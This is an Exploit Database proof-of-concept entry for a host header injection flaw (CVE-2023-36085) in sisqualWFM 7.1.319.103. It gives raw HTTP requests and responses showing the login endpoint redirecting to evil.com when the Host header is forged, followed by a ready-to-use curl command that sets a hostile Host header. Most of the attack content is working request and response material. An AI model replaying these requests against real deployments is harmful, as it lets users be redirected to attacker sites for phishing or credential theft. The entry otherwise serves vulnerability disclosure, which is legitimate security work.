SISQUALWFM 7.1.319.103 – Host Header Injection

• Exploit Database
• 18 阅读

• 作者： Omer Shaik
  日期： 2024-02-15
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51796/

• # Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection
  # Discovered Date: 17/03/2023
  # Reported Date: 17/03/2023
  # Resolved Date: 13/10/2023
  # Exploit Author: Omer Shaik (unknown_exploit)
  # Vendor Homepage: https://www.sisqualwfm.com
  # Version: 7.1.319.103
  # Tested on: SISQUAL WFM 7.1.319.103
  # Affected Version: sisqualWFM - 7.1.319.103
  # Fixed Version: sisqualWFM - 7.1.319.111
  # CVE : CVE-2023-36085
  # CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  # Category: Web Apps
  
  
  
  
  A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.
  
  ****************************************************************************************************
  Orignal Request
  ****************************************************************************************************
  GET /sisqualIdentityServer/core/login HTTP/2
  Host: sisqualwfm.cloud
  Cookie:<cookie>
  Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
  Sec-Ch-Ua-Mobile: ?0
  Sec-Ch-Ua-Platform: "Linux"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  
  ****************************************************************************************************
  Orignal Response
  ****************************************************************************************************
  HTTP/2 302 Found
  Cache-Control: no-store, no-cache, must-revalidate
  Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-Content-Type-Options: nosniff
  X-Frame-Options: sameorigin
  Date: Wed, 22 Mar 2023 13:22:10 GMT
  Content-Length: 0
  ****************************************************************************************************
  
  
  
  
  ██████╗██████╗██████╗
  ██╔══██╗██╔═══██╗██╔════╝
  ██████╔╝██║ ██║██║ 
  ██╔═══╝ ██║ ██║██║ 
  ██║ ╚██████╔╝╚██████╗
  ╚═╝╚═════╝╚═════╝
  
  
  
  
  ****************************************************************************************************
  Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
  ****************************************************************************************************
  GET /sisqualIdentityServer/core/login HTTP/2
  Host: evil.com
  Cookie:<cookie>
  Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
  Sec-Ch-Ua-Mobile: ?0
  Sec-Ch-Ua-Platform: "Linux"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  
  ****************************************************************************************************
  Response
  ****************************************************************************************************
  HTTP/2 302 Found
  Cache-Control: no-store, no-cache, must-revalidate
  Location: https://evil.com/sisqualIdentityServer/core/
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-Content-Type-Options: nosniff
  X-Frame-Options: sameorigin
  Content-Length: 0
  
  
  ****************************************************************************************************
  Method of Attack
  ****************************************************************************************************
  
  curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
  
  ****************************************************************************************************